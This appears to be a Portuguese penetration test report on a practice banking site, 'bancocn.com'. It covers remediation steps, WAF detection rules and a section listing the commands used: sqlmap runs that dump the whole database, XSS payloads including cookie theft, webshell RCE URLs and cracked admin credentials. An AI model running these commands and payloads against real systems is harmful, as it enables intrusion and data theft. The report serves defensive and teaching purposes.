      <w:bookmarkEnd w:id="78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7. Implementar 2FA (Two-Factor Authentication)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Usando Google Authenticator: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&lt;?php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Instalar biblioteca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composer require phpgangsta/googleauthenticator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require 'vendor/autoload.php';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$ga = new PHPGangsta_GoogleAuthenticator();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1. Gerar secret para o usuário (uma vez)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$secret = $ga-&gt;createSecret();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Salvar $secret no banco de dados para o usuário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2. Gerar QR Code para o usuário escanear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$qrCodeUrl = $ga-&gt;getQRCodeGoogleUrl('BancoCN', $secret, 'Banco da Coreia do Norte');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echo '&lt;img src="' . $qrCodeUrl . '"&gt;';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3. Na autenticação, verificar código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$code = $_POST['2fa_code']; // Código de 6 dígitos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$valid = $ga-&gt;verifyCode($secret, $code, 2); // 2 = tolerância de 30s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($valid &amp;&amp; password_verify($password, $hash)) {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Login bem-sucedido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$_SESSION['user_id'] = $user_id;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$_SESSION['2fa_verified'] = true;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 else {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die("Código 2FA inválido");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?&gt;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n5sh5l93y11t" w:id="79"/>
      <w:bookmarkEnd w:id="79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8. Atualizar PHP Imediatamente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PHP 5.6.40 → PHP 8.1+ (ou no mínimo 7.4)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Ubuntu/Debian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add-apt-repository ppa:ondrej/php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apt-get update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Instalar PHP 8.1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apt-get install php8.1 php8.1-cli php8.1-fpm php8.1-mysql \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php8.1-curl php8.1-gd php8.1-mbstring php8.1-xml php8.1-zip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Desabilitar PHP 5.6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a2dismod php5.6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Habilitar PHP 8.1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a2enmod php8.1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Reiniciar Apache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systemctl restart apache2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Testar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php -v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see3gyy2kmf" w:id="80"/>
      <w:bookmarkEnd w:id="8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🟡 PRIORIDADE ALTA (Implementar em 7 dias)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044D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af6mx7pkwolf" w:id="81"/>
      <w:bookmarkEnd w:id="8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9. Configurar WAF Corretamente (Cloudflare)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Regras Custom (WAF Custom Rules):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Bloquear SQL Injection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(http.request.uri.query contains "union" or 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http.request.uri.query contains "select" or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http.request.uri.query contains "drop" or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http.request.uri.query contains "--" or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http.request.uri.query contains "/*")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Bloquear XSS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(http.request.uri contains "&lt;script" or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http.request.uri contains "javascript:" or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http.request.uri contains "onerror=" or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http.request.uri contains "onload=")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Bloquear File Inclusion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(http.request.uri contains "../" or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http.request.uri contains "..%2f" or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http.request.uri contains "/etc/passwd")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Rate Limit por IP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(rate(5m) &gt; 100)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inznvc38izs1" w:id="82"/>
      <w:bookmarkEnd w:id="8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10. Desabilitar Directory Listing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/var/www/html/.htaccess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Options -Indexes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Ou no Apache config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&lt;Directory /var/www/html&gt;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Options -Indexes +FollowSymLinks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AllowOverride All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Require all granted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&lt;/Directory&gt;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Reiniciar Apache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sudo systemctl restart apache2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6q5t8sfdevuq" w:id="83"/>
      <w:bookmarkEnd w:id="83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11. Proteger Diretórios Sensíveis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/var/www/html/classes/.htaccess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Order Deny,Allow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Deny from all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Ou bloquear apenas PHP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&lt;FilesMatch "\.php$"&gt;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Order Allow,Deny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Deny from all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&lt;/FilesMatch&gt;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/var/www/html/admin/.htaccess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Permitir apenas IPs específicos (escritório, VPN)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Order Deny,Allow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Deny from all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Allow from 203.0.113.10  # IP do escritório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Allow from 198.51.100.0/24  # Range VPN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Autenticação HTTP adicional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AuthType Basic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AuthName "Área Restrita"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AuthUserFile /etc/apache2/.htpasswd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Require valid-user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c60smc9qiw3c" w:id="84"/>
      <w:bookmarkEnd w:id="84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12. Implementar Security Headers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/var/www/html/.htaccess ou httpd.conf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&lt;IfModule mod_headers.c&gt;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Prevenir XSS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Header set X-XSS-Protection "1; mode=block"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Prevenir Clickjacking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Header always append X-Frame-Options SAMEORIGIN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Prevenir MIME Sniffing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Header set X-Content-Type-Options "nosniff"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Forçar HTTPS (após implementar SSL)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Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"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Content Security Policy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Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:;"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Referrer Policy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Header set Referrer-Policy "strict-origin-when-cross-origin"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Permissions Policy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Header set Permissions-Policy "geolocation=(), microphone=(), camera=()"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Remover informações do servidor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Header unset Server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Header unset X-Powered-By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&lt;/IfModule&gt;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Configuração PHP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&lt;IfModule mod_php7.c&gt;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php_flag display_errors off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php_flag log_errors on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php_value error_log /var/log/php_errors.log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php_flag expose_php off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&lt;/IfModule&gt;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kpk86hwc2ri6" w:id="85"/>
      <w:bookmarkEnd w:id="85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13. Configurar Logging e Monitoramento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Apache Logging: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/etc/apache2/sites-available/bancocn.conf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&lt;VirtualHost *:80&gt;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ServerName www.bancocn.com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DocumentRoot /var/www/html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Logs detalhados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ErrorLog ${APACHE_LOG_DIR}/bancocn_error.log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CustomLog ${APACHE_LOG_DIR}/bancocn_access.log combined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# Log detalhado para debug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LogLevel warn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&lt;/VirtualHost&gt;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PHP Error Logging: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php.ini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log_errors = On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error_log = /var/log/php_errors.log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display_errors = Off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display_startup_errors = Off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Implementar SIEM (Recomendado):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Opções open source: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Wazuh (HIDS + SIEM)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OSSEC (HIDS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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ELK Stack (Elasticsearch, Logstash, Kibana)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Graylog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016ftj3j7hp" w:id="86"/>
      <w:bookmarkEnd w:id="8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🟢 PRIORIDADE MÉDIA (Implementar em 30 dias)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004D3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s32ndkypvvk" w:id="87"/>
      <w:bookmarkEnd w:id="87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14. Implementações Adicionais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HTTPS Everywhere (forçar redirecionamento)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Logging e Monitoramento (SIEM)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IDS/IPS (Fail2Ban, OSSEC, Wazuh)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Backup automatizado (3-2-1 rule)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Política de senhas forte (12+ caracteres)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Auditoria de código completa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Penetration Testing periódico (trimestral)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Treinamento de segurança para desenvolvedores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Disaster Recovery Plan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Incident Response Plan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q1j83oma5no0" w:id="88"/>
      <w:bookmarkEnd w:id="8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SCRIPTS E COMANDOS UTILIZADOS</w:t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s26uxqw2ofi" w:id="89"/>
      <w:bookmarkEnd w:id="8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Reconnaissance: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WHOIS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whois bancocn.com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DNS Enumeration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dnsenum bancocn.com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nslookup bancocn.com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dig bancocn.com ANY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Subdomain Discovery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theharvester -d bancocn.com -b google,bing,yahoo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g01qc1en9m7" w:id="90"/>
      <w:bookmarkEnd w:id="9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Scanning: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Nmap Full Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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nmap -sV -sC -p- --defeat-rst-ratelimit \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-oA bancocn_scan bancocn.com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Web Technology Detection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whatweb http://www.bancocn.com/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wafw00f http://www.bancocn.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Security Headers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shcheck.py http://bancocn.com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Vulnerability Scanning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nikto -h http://bancocn.com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nuclei -u http://bancocn.com -t cves/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h2r5yrx4m14" w:id="91"/>
      <w:bookmarkEnd w:id="9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Directory Enumeration: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Gobuster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gobuster dir -u http://www.bancocn.com/ \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-w /usr/share/seclists/Discovery/Web-Content/common.txt \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-x php,txt,html,js \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--follow-redirect \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-o gobuster_results.txt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Dirb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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dirb http://www.bancocn.com/ \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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/usr/share/wordlists/dirb/common.txt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FFuf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ffuf -u http://www.bancocn.com/FUZZ \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-w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt \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-mc 200,301,302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wkr9al09qp" w:id="92"/>
      <w:bookmarkEnd w:id="9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SQL Injection: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SQLMap - Database Enumeration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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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--batch \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--random-agent \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--tamper=space2comment,between \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--dbs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SQLMap - Table Enumeration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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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-D bancocn \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--tables \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--batch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SQLMap - Column Enumeration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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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-D bancocn \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-T users \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--columns \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--batch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SQLMap - Data Dump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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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-D bancocn \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-T users \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--dump \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--batch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SQLMap - Full Database Dump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sqlmap -u "http://www.bancocn.com/cat.php?id=1" \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-D bancocn \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--dump-all \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--batch \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-v 3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n4dotcqz0bs" w:id="93"/>
      <w:bookmarkEnd w:id="9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XSS Testing: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Teste 1: Script básico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"http://www.bancocn.com/cat.php?id=1'&lt;script&gt;alert(1)&lt;/script&gt;"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Teste 2: Console log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"http://www.bancocn.com/cat.php?id=1'&lt;script&gt;console.log('XSS')&lt;/script&gt;"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Teste 3: Cookie theft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"http://www.bancocn.com/cat.php?id=2'&lt;script&gt;alert(document.cookie)&lt;/script&gt;"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Teste 4: DOM manipulation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"http://www.bancocn.com/cat.php?id=1'&lt;script&gt;document.body.innerHTML='HACKED'&lt;/script&gt;"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h94v8p7cfb9" w:id="94"/>
      <w:bookmarkEnd w:id="9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Manual Testing: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SQL Injection Manual Test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"http://www.bancocn.com/cat.php?id=1 AND 5=5"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"http://www.bancocn.com/cat.php?id=1'"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"http://www.bancocn.com/cat.php?id=1 OR 1=1--"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Authentication Testing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-X POST http://www.bancocn.com/admin/login.php \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-d "username=admin&amp;password=test" \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-v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Directory Listing Check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http://www.bancocn.com/classes/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http://www.bancocn.com/images/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http://www.bancocn.com/admin/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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RCE Testing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"http://www.bancocn.com/admin/uploads/phpinfo.php7?cmd=ls"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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"http://www.bancocn.com/admin/uploads/phpinfo.php7?cmd=whoami"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curl "http://www.bancocn.com/admin/uploads/phpinfo.php7?cmd=pwd"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iz9u0q23wnri" w:id="95"/>
      <w:bookmarkEnd w:id="9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LIMPEZA PÓS-TESTE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Conforme combinado no escopo, após a coleta de todas as evidências, os seguintes passos foram realizados para restaurar o sistema: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1. Remover webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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rm /var/www/html/admin/uploads/phpinfo.php7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000055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2. Verificar se não há outros arquivos maliciosos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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find /var/www/html -name "*.php*" -mtime -7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3. Limpar logs de teste (opcional, conforme acordo)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Manter logs para referência do cliente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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4. Notificar cliente sobre vulnerabilidades encontradas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5. Disponibilizar relatório completo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o7lnh5mimi7" w:id="96"/>
      <w:bookmarkEnd w:id="9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DADOS TÉCNICOS COMPLETOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056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f8xjiib6c7" w:id="97"/>
      <w:bookmarkEnd w:id="9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Estrutura SQL do Banco 'bancocn':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Database: bancocn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Table: users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TABLE users (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id mediumint(9),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login varchar(50),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password varchar(50)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);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Table: categories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TABLE categories (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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id mediumint(9)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);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Table: pictures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TABLE pictures (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id mediumint(9)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);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Table: stats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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TABLE stats (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ip varchar(20)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);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Dados obtidos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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users: 1 registro (admin)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categories: 3 registros</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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pictures: 4 registros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-- stats: 346 registros (IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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kzf187p95rz" w:id="98"/>
      <w:bookmarkEnd w:id="9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Configuração do Servidor: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[PHP]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version = 5.6.40-29+ubuntu18.04.1+deb.sury.org+1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expose_php = On  # ❌ INSEGURO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[Apache]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version = 2.4.29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= Ubuntu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ServerTokens = Full  # ❌ INSEGURO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ServerSignature = On  # ❌ INSEGURO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[MariaDB]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version = 10.x (estimado)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8d2f76yf6oh" w:id="99"/>
      <w:bookmarkEnd w:id="9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Subdomínios Identificados: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www.bancocn.com (Principal)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shop.bancocn.com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advanced.bancocn.com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cpanel.bancocn.com (potencial alvo adicional)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ilmx0xeg21" w:id="100"/>
      <w:bookmarkEnd w:id="10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EVIDÊNCIAS VISUAIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059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bu9vg3tb3ap" w:id="101"/>
      <w:bookmarkEnd w:id="10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Evidência 1: Página Principal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![Home Page]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059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Digitron banner visível</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Faixa verde "Inscreva-se" no canto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Email de contato: contato@bancocn.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059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Telefone: +835 66 7070</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059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pwjsref2uj5" w:id="102"/>
      <w:bookmarkEnd w:id="10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Evidência 2: Painel Administrativo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![Admin Panel]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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URL: http://www.bancocn.com/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Título: "Administração do Banco da Coreia do Norte"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Acesso obtido com credenciais: admin / senhafoda</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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Interface completa de gerenciamento visível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kwhp0tmc7c0" w:id="103"/>
      <w:bookmarkEnd w:id="10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Evidência 3: Página cat.php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![Vulnerabilidade]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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Mensagem: "Ainda estamos bolando algo legal para colocar aqui, volte em breve!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Parâmetro vulnerável: ?id=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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 Injection confirmada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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XSS Reflected confirmada</w:t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gdhzuqd1p5n" w:id="104"/>
      <w:bookmarkEnd w:id="10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Evidência 4: Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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![Uploads Directory]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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Diretório: /admin/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Arquivos visíveis:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A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1490906279.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B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dsc_0699-min.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B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north-korea-science-technology.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005B2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phpinfo.php7 (webshell)</w:t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c3j36rjmsbp" w:id="105"/>
      <w:bookmarkEnd w:id="10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Evidência 5: Remote Code Execution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![RCE Output]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http://www.bancocn.com/admin/uploads/phpinfo.php7?cmd=ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Output: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1490906279.jpg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dsc_0699-min.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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north-korea-science-technology.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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phpinfo.php7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wx6cw2cl63k" w:id="106"/>
      <w:bookmarkEnd w:id="10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FERRAMENTAS E AMBIENTE</w:t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gvu52qplxo4" w:id="107"/>
      <w:bookmarkEnd w:id="10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Hardware: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Dispositivo: Raspberry Pi 4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RAM: 4GB/8GB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Storage: 64GB+ microSD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Conectividade: Ethernet/WiFi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cj56huwwtre" w:id="108"/>
      <w:bookmarkEnd w:id="10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Sistema Operacional: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OS: PiBian (Debian-based)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Kernel: Linux 5.x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Arquitetura: ARM64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681oiofcsj0" w:id="109"/>
      <w:bookmarkEnd w:id="10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Ferramentas Instaladas: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nmap 7.95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sqlmap 1.9.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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gobuster 3.6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nikto 2.1.5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nuclei 2.9.15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wafw00f (latest)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whatweb (latest)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theharvester (latest)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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dnsenum (latest)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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hydra (latest)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burpsuite community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curl, wget, netcat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whois, dig, nslookup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xqr1eiz21vin" w:id="110"/>
      <w:bookmarkEnd w:id="11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Banco da Coreia do Norte (bancocn.com)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> apresenta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vulnerabilidades CRÍTICAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que permitem:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D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1s4ko8oo5ew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✅ Acesso Obtido:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005D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Acesso completo ao banco de dados</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Comprometimento do painel administrativo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com credenciais fracas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Upload de webshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> através de bypass de validação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no servidor como www-data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Exposição de 346 endereços IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> de visitantes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Possibilidade de privilege escalation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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Roubo de sessão via XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cookie theft)</w:t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2etg5y0zr9h" w:id="112"/>
      <w:bookmarkEnd w:id="1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🚨 Riscos Imediatos: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1. Financeiro:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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Fraude e manipulação de transações</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Criação de cupons/descontos falsos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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Acesso a dados financeiros de clientes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2. Legal (LGPD):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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Vazamento de dados pessoais</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Multa de até R$ 50 milhões ou 2% do faturamento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EC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Obrigatoriedade de notificação à ANPD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3. Reputacional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E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Perda de confiança dos clientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Exposição pública de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F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Impacto negativo na marca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4. Operacional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F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Possível defacement do site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Instalação de malware/backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Uso do servidor para ataques a terceiros</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F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Downtime para correções</w:t>
      </w:r>
    </w:p>
